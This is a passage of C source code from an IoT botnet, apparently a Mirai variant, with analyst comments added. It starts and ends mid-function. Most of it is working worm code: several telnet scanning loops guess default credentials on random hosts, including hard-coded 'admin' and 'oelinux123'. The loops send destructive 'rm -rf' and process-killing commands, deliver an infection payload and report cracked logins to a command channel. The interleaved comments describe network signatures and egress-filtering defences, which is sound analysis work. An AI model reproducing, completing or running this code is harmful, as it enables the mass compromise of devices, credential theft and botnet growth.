  2092. advance_telstate(&fds[i], 0);
  2093. }
  2094. else
  2095. {
  2096. advance_telstate(&fds[i], 5);
  2097. }
  2098. continue;
  2099. }
  2100. if(fds[i].tTimeout + 7 < time(NULL))
  2101. {
  2102. reset_telstate(&fds[i]);
  2103. }
  2104. }
  2105. break;
  2106. case 5:
  2107. {
  2108. if(send(fds[i].fd, Mirai_Passwords[fds[i].passwordInd], strlen(Mirai_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
  2109. {
  2110. reset_telstate(&fds[i]);
  2111. continue;
  2112. }
  2113. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  2114. {
  2115. reset_telstate(&fds[i]);
  2116. continue;
  2117. }
  2118. advance_telstate(&fds[i], 6);
  2119. }
  2120. break;
  2121. case 6:
  2122. {
  2123. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2)) //waiting for response.
  2124. {
  2125. fds[i].tTimeout = time(NULL);
  2126. if(contains_fail(fds[i].sockbuf))
  2127. {
  2128. advance_telstate(&fds[i], 0);
  2129. }
  2130. else if(contains_success(fds[i].sockbuf))
  2131. {
  2132. if(fds[i].complete == 2)
  2133. {
  2134. advance_telstate(&fds[i], 7);
  2135. }
  2136. else
  2137. {
  2138. sockprintf(mainCommSock, "[ MIRAI ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
  2139. sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2140. advance_telstate(&fds[i], 7);
  2141. }
  2142. }
  2143. else
  2144. {
  2145. reset_telstate(&fds[i]);
  2146. }
  2147. continue;
  2148. }
  2149. if(fds[i].tTimeout + 7 < time(NULL))
  2150. {
  2151. reset_telstate(&fds[i]);
  2152. }
  2153. }
  2154. break;
  2155. case 7:
  2156. {
  2157. char RemoveTheTempDirs [80];
  2158. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
  2159. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  2160. RemoveTempDirs();
  2161. sockprintf(mainCommSock, "[ MIRAI ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2162. char killtheproccesses[80];
  2163. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
  2164. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  2165. sockprintf(mainCommSock, "[ MIRAI ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2166. advance_telstate(&fds[i], 8);
  2167. }
  2168. break;
  2169. case 8:
  2170. {
  2171. fds[i].tTimeout = time(NULL);
  2172. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
  2173. if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
  2174. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  2175. sockprintf(mainCommSock, "[ MIRAI ] Sending Infection Payload. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
  2176. //int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings)
  2177. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "connected"))
  2178. {
  2179. //char strcasestr (const char *big, const char *little)
  2180. if(strcasestr(fds[i].sockbuf, "CONNECTED") && fds[i].complete != 3)
  2181. {
  2182. sockprintf(mainCommSock, "[ MIRAI ] Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
  2183. }
  2184. }
  2185. if(fds[i].tTimeout + 60 < time(NULL))
  2186. {
  2187. if(fds[i].complete!=3)
  2188. {
  2189. sockprintf(mainCommSock, "[ MIRAI ] Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
  2190. }
  2191. reset_telstate(&fds[i]);
  2192. }
  2193. break;
  2194. }
  2195. }
  2196. }
  2197. }
  2198. }
  // PhoneScanner: endless telnet (TCP/23) login loop over 253 connection slots.
  // Each slot is a small state machine (fds[i].state 0..10): connect to an address
  // returned by PhoneScan(), wait for prompts with read_until_response(), answer
  // with fixed strings, then send cleanup command lines and phonepayload.
  // The function never returns (while(1) with no exit path).
  //
  // Analyst notes:
  // - The login strings are hard-coded in the send() calls, not read from a table.
  // - Every slot points at the same 254-byte buffer (fds[i].sockbuf = buffer), so
  //   prompt data from different sessions lands in shared storage.
  // - Network-visible behaviour: up to 253 concurrent outbound TCP connections to
  //   port 23, each carrying the same fixed login strings. Hosts with no need for
  //   outbound telnet can alert on or block egress to TCP/23; the loop depends on
  //   devices that expose telnet with factory credentials.
  2199. void PhoneScanner() {
  2200. int maxfds = 253, i, res, j, valopt;
  2201. int max = maxfds;
  2202. char buf[128], cur_dir;
  2203. fd_set fdset;
  2204. struct timeval tv;
  2205. socklen_t lon;
  2206. srand(time(NULL) ^ rand_cmwc());
  2207. char line[253];
  2208. char* buffer;
  2209. struct sockaddr_in dest_addr;
  2210. dest_addr.sin_family = AF_INET;
  2211. dest_addr.sin_port = htons(23);
  2212. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2213. buffer = malloc(253 + 1);
  2214. memset(buffer, 0, 253 + 1);
  2215. struct telstate_t fds[max];
  2216. memset(fds, 0, max * (sizeof(int) + 1));
  // Mark every slot "complete" so state 0 assigns it a fresh address on first use.
  2217. for(i = 0; i < max; i++) {
  2218. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  2219. fds[i].complete = 1;
  2220. fds[i].sockbuf = buffer; }
  2221. while(1) {
  2222. for(i = 0; i < max; i++) {
  2223. if(fds[i].tTimeout == 0) {
  2224. fds[i].tTimeout = time(NULL); }
  2225. switch(fds[i].state) {
  // State 0: if complete == 1, wipe the slot and take a new address from
  // PhoneScan(); then start a non-blocking connect to port 23.
  2226. case 0: {
  2227. if(fds[i].complete == 1) {
  2228. char *tmp = fds[i].sockbuf;
  2229. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  2230. fds[i].sockbuf = tmp;
  2231. fds[i].ip = PhoneScan(); }
  2232. dest_addr.sin_family = AF_INET;
  2233. dest_addr.sin_port = htons(23);
  2234. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2235. dest_addr.sin_addr.s_addr = fds[i].ip;
  2236. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  2237. if(fds[i].fd == -1) continue;
  2238. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  2239. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
  2240. sclose(fds[i].fd);
  2241. fds[i].complete = 1; }
  2242. else {
  2243. fds[i].state = 1;
  2244. fds[i].tTimeout = 0;
  2245. }
  2246. }
  2247. break;
  // State 1: poll for connect completion with a 10 ms select(); SO_ERROR decides
  // success. On success the socket is switched back to blocking mode. The slot
  // is abandoned after 6 seconds.
  2248. case 1: {
  2249. FD_ZERO(&fdset);
  2250. FD_SET(fds[i].fd, &fdset);
  2251. tv.tv_sec = 0;
  2252. tv.tv_usec = 10000;
  2253. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  2254. if(res == 1) {
  2255. lon = sizeof(int);
  2256. valopt = 0;
  2257. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  2258. if(valopt) {
  2259. sclose(fds[i].fd);
  2260. fds[i].state = 0;
  2261. fds[i].complete = 1;
  2262. } else {
  2263. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  2264. fds[i].tTimeout = 0;
  2265. fds[i].bufUsed = 0;
  2266. memset(fds[i].sockbuf, 0, 253);
  2267. fds[i].state = 2;
  2268. } continue; }
  2269. else if(res == -1) {
  2270. sclose(fds[i].fd);
  2271. fds[i].state = 0;
  2272. fds[i].complete = 1;
  2273. continue; }
  2274. if(fds[i].tTimeout + 6 < time(NULL)) {
  2275. sclose(fds[i].fd);
  2276. fds[i].state = 0;
  2277. fds[i].complete = 1;
  2278. }
  2279. }
  2280. break;
  // States 2, 4 and 8: wait for a prompt from the `phone` string list (defined
  // elsewhere in the file); a contains_fail() match sends the slot back to state 0.
  2281. case 2: {
  2282. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, phone)) {
  2283. if(contains_fail(fds[i].sockbuf)) {
  2284. fds[i].state = 0;
  2285. } else {
  2286. fds[i].state = 3; }
  2287. continue; }
  2288. if(fds[i].tTimeout + 6 < time(NULL)) {
  2289. fds[i].state = 0;
  2290. fds[i].complete = 1;
  2291. }
  2292. }
  2293. break;
  // States 3 and 5: the same fixed string is sent as login name and then as password.
  2294. case 3: {
  2295. if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
  2296. fds[i].state = 0;
  2297. fds[i].complete = 1;
  2298. continue; }
  2299. fds[i].state = 4;
  2300. }
  2301. break;
  2302. case 4: {
  2303. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, phone)) {
  2304. if(contains_fail(fds[i].sockbuf)) {
  2305. fds[i].state = 0;
  2306. } else {
  2307. fds[i].state = 5; }
  2308. continue; }
  2309. if(fds[i].tTimeout + 6 < time(NULL)) {
  2310. fds[i].state = 0;
  2311. fds[i].complete = 1;
  2312. }
  2313. }
  2314. break;
  2315. case 5: {
  2316. if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
  2317. fds[i].state = 0;
  2318. fds[i].complete = 1;
  2319. continue; }
  2320. fds[i].state = 6; }
  2321. break;
  // State 6: wait for a post-login prompt from the `advances2` list. Reporting to
  // mainCommSock is commented out here, so this variant does not announce
  // successful logins on that socket.
  2322. case 6: {
  2323. if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, advances2)) {
  2324. fds[i].tTimeout = time(NULL);
  2325. if (contains_fail(fds[i].sockbuf)) {
  2326. fds[i].state = 0;
  2327. } else {
  2328. //sockprintf(mainCommSock, "[ PHONE ] Successfully Bruted. || IP: %s || Port: 23 || Username: admin || Password: admin", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2329. fds[i].state = 7;
  2330. } continue; }
  2331. if (fds[i].tTimeout + 7 < time(NULL)) {
  2332. fds[i].state = 0;
  2333. fds[i].complete = 1;
  2334. }
  2335. }
  2336. break;
  // State 7: send two command lines over the telnet session, built from
  // Temp_Directorys and Bot_Killer_Binarys (defined elsewhere), then "su".
  // On the receiving device this shows up as `rm -rf ...` followed by
  // `pkill -9 ...;killall -9 ...` typed within one session, which is a usable
  // pattern for telnet session logging on a honeypot or gateway.
  // RemoveTempDirs() runs on the local host; its body is not visible here.
  2337. case 7: {
  2338. char RemoveTheTempDirs [80];
  2339. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
  2340. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  2341. RemoveTempDirs();
  2342. //sockprintf(mainCommSock, "[ PHONE ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: admin || Password: admin", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2343. char killtheproccesses[80];
  2344. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
  2345. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  2346. //sockprintf(mainCommSock, "[ PHONE ] Bot Killing. || IP: %s || Port: 23 || Username: admin || Password: admin", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2347. if(send(fds[i].fd, "su\r\n", 4, MSG_NOSIGNAL) < 0) {
  2348. fds[i].state = 0;
  2349. fds[i].complete = 1;
  2350. continue; }
  2351. fds[i].state = 8;
  2352. }
  2353. break;
  2354. case 8: {
  2355. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, phone)) {
  2356. if(contains_fail(fds[i].sockbuf)) {
  2357. fds[i].state = 0;
  2358. } else {
  2359. fds[i].state = 9; }
  2360. continue; }
  2361. if(fds[i].tTimeout + 6 < time(NULL)) {
  2362. fds[i].state = 0;
  2363. fds[i].complete = 1;
  2364. }
  2365. }
  2366. break;
  // State 9: answer the prompt that follows "su" with a second hard-coded string.
  2367. case 9: {
  2368. if(send(fds[i].fd, "oelinux123\r\n", 12, MSG_NOSIGNAL) < 0) {
  2369. fds[i].state = 0;
  2370. fds[i].complete = 1;
  2371. continue; }
  2372. fds[i].state = 10;
  2373. }
  2374. break;
  // State 10: send phonepayload (defined elsewhere). tTimeout is refreshed at the
  // top of this case on every pass, so the 60-second check below compares
  // against a timestamp taken moments earlier.
  2375. case 10: {
  2376. fds[i].tTimeout = time(NULL);
  2377. if(send(fds[i].fd, phonepayload, strlen(phonepayload), MSG_NOSIGNAL) < 0) {
  2378. sclose(fds[i].fd);
  2379. fds[i].state = 0;
  2380. fds[i].complete = 1;
  2381. continue; }
  2382. fds[i].complete = 3;
  2383. if(fds[i].tTimeout + 60 < time(NULL)) {
  2384. if(fds[i].complete !=3){
  2385. }
  2386. fds[i].state = 0;
  2387. fds[i].complete = 1;
  2388. }
  2389. break;
  2390. }
  2391. }
  2392. }
  2393. }
  2394. }
  // HackaShit: endless telnet (TCP/23) credential-guessing loop over 256 slots,
  // each with its own 257-byte response buffer. Target addresses come from
  // findARandomIP(); login strings come from Telnet_Usernames / Telnet_Passwords
  // (both defined elsewhere). The function never returns.
  //
  // Analyst notes:
  // - On retry the username and password indices advance together, so entry N of
  //   one table is always paired with entry N of the other.
  // - A login that reaches state 6 without a contains_fail() match is reported
  //   on mainCommSock with the literal prefixes "[ TELNET ] Successfully Bruted."
  //   and "REPORT host:user:pass". If that channel is unencrypted (not visible
  //   here), those literals are candidate network signatures.
  // - Network-visible behaviour: up to 256 concurrent outbound TCP/23
  //   connections to unrelated addresses. Egress filtering of TCP/23 and
  //   removing default telnet credentials on devices both cut this loop off.
  2395. void HackaShit() {
  2396. char buf[128];
  2397. int max = 256, i, res, valopt;
  2398. fd_set fdset;
  2399. struct timeval tv;
  2400. socklen_t lon;
  2401. srand(time(NULL) ^ rand_cmwc());
  2402. struct sockaddr_in dest_addr;
  2403. dest_addr.sin_family = AF_INET;
  2404. dest_addr.sin_port = htons(23);
  2405. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2406. struct telstate_t fds[max];
  2407. memset(fds, 0, max * (sizeof(int) + 1));
  // Mark every slot "complete" so state 0 assigns it a fresh address on first use.
  2408. for(i = 0; i < max; i++) {
  2409. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  2410. fds[i].complete = 1;
  2411. fds[i].sockbuf = malloc(256 + 1); }
  2412. while(1) {
  2413. for(i = 0; i < max; i++) {
  2414. if(fds[i].tTimeout == 0) {
  2415. fds[i].tTimeout = time(NULL); }
  2416. switch(fds[i].state) {
  // State 0: a completed slot is wiped and given a new address; otherwise the
  // same address is retried with the next table entry. Running off the end of
  // either table marks the slot complete.
  2417. case 0: {
  2418. if(fds[i].complete) {
  2419. char *tmp = fds[i].sockbuf;
  2420. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  2421. fds[i].sockbuf = tmp;
  2422. fds[i].ip = findARandomIP(); }
  2423. else {
  2424. fds[i].passwordInd++;
  2425. fds[i].usernameInd++;
  2426. if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *)) {
  2427. fds[i].complete = 1;
  2428. continue; }
  2429. if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *)) {
  2430. fds[i].complete = 1;
  2431. continue;
  2432. }
  2433. }
  2434. dest_addr.sin_family = AF_INET;
  2435. dest_addr.sin_port = htons(23);
  2436. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2437. dest_addr.sin_addr.s_addr = fds[i].ip;
  2438. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  2439. if(fds[i].fd == -1) continue;
  2440. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  2441. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
  2442. sclose(fds[i].fd);
  2443. fds[i].complete = 1; }
  2444. else {
  2445. fds[i].state = 1;
  2446. fds[i].tTimeout = 0;
  2447. }
  2448. }
  2449. break;
  // State 1: poll for connect completion with a 10 ms select(); SO_ERROR decides
  // success. The slot is abandoned after 6 seconds.
  2450. case 1: {
  2451. FD_ZERO(&fdset);
  2452. FD_SET(fds[i].fd, &fdset);
  2453. tv.tv_sec = 0;
  2454. tv.tv_usec = 10000;
  2455. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  2456. if(res == 1) {
  2457. lon = sizeof(int);
  2458. valopt = 0;
  2459. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  2460. if(valopt) {
  2461. sclose(fds[i].fd);
  2462. fds[i].state = 0;
  2463. fds[i].complete = 1;
  2464. } else {
  2465. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  2466. fds[i].tTimeout = 0;
  2467. fds[i].bufUsed = 0;
  2468. memset(fds[i].sockbuf, 0, 256);
  2469. fds[i].state = 2;
  2470. } continue; }
  2471. else if(res == -1) {
  2472. sclose(fds[i].fd);
  2473. fds[i].state = 0;
  2474. fds[i].complete = 1;
  2475. continue; }
  2476. if(fds[i].tTimeout + 6 < time(NULL)) {
  2477. sclose(fds[i].fd);
  2478. fds[i].state = 0;
  2479. fds[i].complete = 1;
  2480. }
  2481. }
  2482. break;
  // States 2 and 4: wait for a login/password prompt from the `advances` list.
  2483. case 2: {
  2484. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances)) {
  2485. if(contains_fail(fds[i].sockbuf)) {
  2486. fds[i].state = 0;
  2487. } else {
  2488. fds[i].state = 3; }
  2489. continue; }
  2490. if(fds[i].tTimeout + 6 < time(NULL)) {
  2491. fds[i].state = 0;
  2492. fds[i].complete = 1;
  2493. }
  2494. }
  2495. break;
  // State 3: send the current username followed by CRLF.
  2496. case 3: {
  2497. if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
  2498. fds[i].state = 0;
  2499. fds[i].complete = 1;
  2500. continue; }
  2501. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
  2502. fds[i].state = 0;
  2503. fds[i].complete = 1;
  2504. continue; }
  2505. fds[i].state = 4; }
  2506. break;
  2507. case 4: {
  2508. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances))
  2509. {
  2510. if(contains_fail(fds[i].sockbuf)) {
  2511. fds[i].state = 0;
  2512. } else {
  2513. fds[i].state = 5; }
  2514. continue; }
  2515. if(fds[i].tTimeout + 6 < time(NULL)) {
  2516. fds[i].state = 0;
  2517. fds[i].complete = 1;
  2518. }
  2519. }
  2520. break;
  // State 5: send the current password followed by CRLF.
  2521. case 5: {
  2522. if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
  2523. fds[i].state = 0;
  2524. fds[i].complete = 1;
  2525. continue; }
  2526. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
  2527. fds[i].state = 0;
  2528. fds[i].complete = 1;
  2529. continue; }
  2530. fds[i].state = 6;
  2531. }
  2532. break;
  // State 6: any response from the `advances2` list that contains_fail() does
  // not flag is treated as a successful login and reported on mainCommSock.
  2533. case 6: {
  2534. if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances2)) {
  2535. fds[i].tTimeout = time(NULL);
  2536. if (contains_fail(fds[i].sockbuf)) {
  2537. fds[i].state = 0;
  2538. } else {
  2539. sockprintf(mainCommSock, "[ TELNET ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2540. sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2541. fds[i].state = 7;
  2542. } continue; }
  2543. if (fds[i].tTimeout + 6 < time(NULL)) {
  2544. fds[i].state = 0;
  2545. fds[i].complete = 1;
  2546. }
  2547. }
  2548. break;
  // State 7: send `rm -rf ...` and `pkill -9 ...;killall -9 ...` command lines
  // built from Temp_Directorys and Bot_Killer_Binarys, then Busybox_Payload.
  // Each step is also announced on mainCommSock. On the receiving device this
  // command sequence inside one telnet session is a usable logging pattern.
  // RemoveTempDirs() runs on the local host; its body is not visible here.
  2549. case 7: {
  2550. char RemoveTheTempDirs [80];
  2551. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
  2552. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  2553. RemoveTempDirs();
  2554. sockprintf(mainCommSock, "[ TELNET ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2555. char killtheproccesses[80];
  2556. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
  2557. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  2558. sockprintf(mainCommSock, "[ TELNET ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2559. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
  2560. fds[i].state = 0;
  2561. fds[i].complete = 1;
  2562. continue; }
  2563. fds[i].state = 8;
  2564. }
  2565. break;
  // State 8: send Busybox_Payload again. tTimeout is refreshed at the top of this
  // case on every pass, so the 60-second check below compares against a
  // timestamp taken moments earlier.
  2566. case 8: {
  2567. fds[i].tTimeout = time(NULL);
  2568. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
  2569. sclose(fds[i].fd);
  2570. fds[i].state = 0;
  2571. fds[i].complete = 1;
  2572. continue; }
  2573. fds[i].complete = 3;
  2574. if(fds[i].tTimeout + 60 < time(NULL)) {
  2575. if(fds[i].complete !=3){
  2576. }
  2577. fds[i].state = 0;
  2578. fds[i].complete = 1;
  2579. }
  2580. break;
  2581. }
  2582. }
  2583. }
  2584. }
  2585. }
  // MiraiHackaShit: endless telnet (TCP/23) credential-guessing loop over 256
  // slots, each with its own 257-byte response buffer. Target addresses come
  // from MiraiIPRanges(); login strings come from Telnet_Usernames /
  // Telnet_Passwords (both defined elsewhere). The function never returns.
  //
  // Analyst notes:
  // - The state machine has the same shape as HackaShit in this file; the
  //   visible differences are the address source and the "[ MIRAI ]" label in
  //   the status strings.
  // - Successful logins are reported on mainCommSock with the literal prefixes
  //   "[ MIRAI ] Successfully Bruted." and "REPORT host:user:pass". If that
  //   channel is unencrypted (not visible here), those literals are candidate
  //   network signatures.
  // - Network-visible behaviour: up to 256 concurrent outbound TCP/23
  //   connections. Egress filtering of TCP/23 and removing default telnet
  //   credentials on devices both cut this loop off.
  2586. void MiraiHackaShit() {
  2587. char buf[128];
  2588. int max = 256, i, res, valopt;
  2589. fd_set fdset;
  2590. struct timeval tv;
  2591. socklen_t lon;
  2592. srand(time(NULL) ^ rand_cmwc());
  2593. struct sockaddr_in dest_addr;
  2594. dest_addr.sin_family = AF_INET;
  2595. dest_addr.sin_port = htons(23);
  2596. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2597. struct telstate_t fds[max];
  2598. memset(fds, 0, max * (sizeof(int) + 1));
  // Mark every slot "complete" so state 0 assigns it a fresh address on first use.
  2599. for(i = 0; i < max; i++) {
  2600. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  2601. fds[i].complete = 1;
  2602. fds[i].sockbuf = malloc(256 + 1); }
  2603. while(1) {
  2604. for(i = 0; i < max; i++) {
  2605. if(fds[i].tTimeout == 0) {
  2606. fds[i].tTimeout = time(NULL); }
  2607. switch(fds[i].state) {
  // State 0: a completed slot is wiped and given a new address; otherwise the
  // same address is retried with the next table entry (both indices advance
  // together). Running off the end of either table marks the slot complete.
  2608. case 0: {
  2609. if(fds[i].complete) {
  2610. char *tmp = fds[i].sockbuf;
  2611. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  2612. fds[i].sockbuf = tmp;
  2613. fds[i].ip = MiraiIPRanges(); }
  2614. else {
  2615. fds[i].passwordInd++;
  2616. fds[i].usernameInd++;
  2617. if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *)) {
  2618. fds[i].complete = 1;
  2619. continue; }
  2620. if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *)) {
  2621. fds[i].complete = 1;
  2622. continue;
  2623. }
  2624. }
  2625. dest_addr.sin_family = AF_INET;
  2626. dest_addr.sin_port = htons(23);
  2627. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2628. dest_addr.sin_addr.s_addr = fds[i].ip;
  2629. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  2630. if(fds[i].fd == -1) continue;
  2631. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  2632. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
  2633. sclose(fds[i].fd);
  2634. fds[i].complete = 1; }
  2635. else {
  2636. fds[i].state = 1;
  2637. fds[i].tTimeout = 0;
  2638. }
  2639. }
  2640. break;
  // State 1: poll for connect completion with a 10 ms select(); SO_ERROR decides
  // success. The slot is abandoned after 6 seconds.
  2641. case 1: {
  2642. FD_ZERO(&fdset);
  2643. FD_SET(fds[i].fd, &fdset);
  2644. tv.tv_sec = 0;
  2645. tv.tv_usec = 10000;
  2646. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  2647. if(res == 1) {
  2648. lon = sizeof(int);
  2649. valopt = 0;
  2650. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  2651. if(valopt) {
  2652. sclose(fds[i].fd);
  2653. fds[i].state = 0;
  2654. fds[i].complete = 1;
  2655. } else {
  2656. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  2657. fds[i].tTimeout = 0;
  2658. fds[i].bufUsed = 0;
  2659. memset(fds[i].sockbuf, 0, 256);
  2660. fds[i].state = 2;
  2661. } continue; }
  2662. else if(res == -1) {
  2663. sclose(fds[i].fd);
  2664. fds[i].state = 0;
  2665. fds[i].complete = 1;
  2666. continue; }
  2667. if(fds[i].tTimeout + 6 < time(NULL)) {
  2668. sclose(fds[i].fd);
  2669. fds[i].state = 0;
  2670. fds[i].complete = 1;
  2671. }
  2672. }
  2673. break;
  // States 2 and 4: wait for a login/password prompt from the `advances` list.
  2674. case 2: {
  2675. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances)) {
  2676. if(contains_fail(fds[i].sockbuf)) {
  2677. fds[i].state = 0;
  2678. } else {
  2679. fds[i].state = 3; }
  2680. continue; }
  2681. if(fds[i].tTimeout + 6 < time(NULL)) {
  2682. fds[i].state = 0;
  2683. fds[i].complete = 1;
  2684. }
  2685. }
  2686. break;
  // State 3: send the current username followed by CRLF.
  2687. case 3: {
  2688. if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
  2689. fds[i].state = 0;
  2690. fds[i].complete = 1;
  2691. continue; }
  2692. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
  2693. fds[i].state = 0;
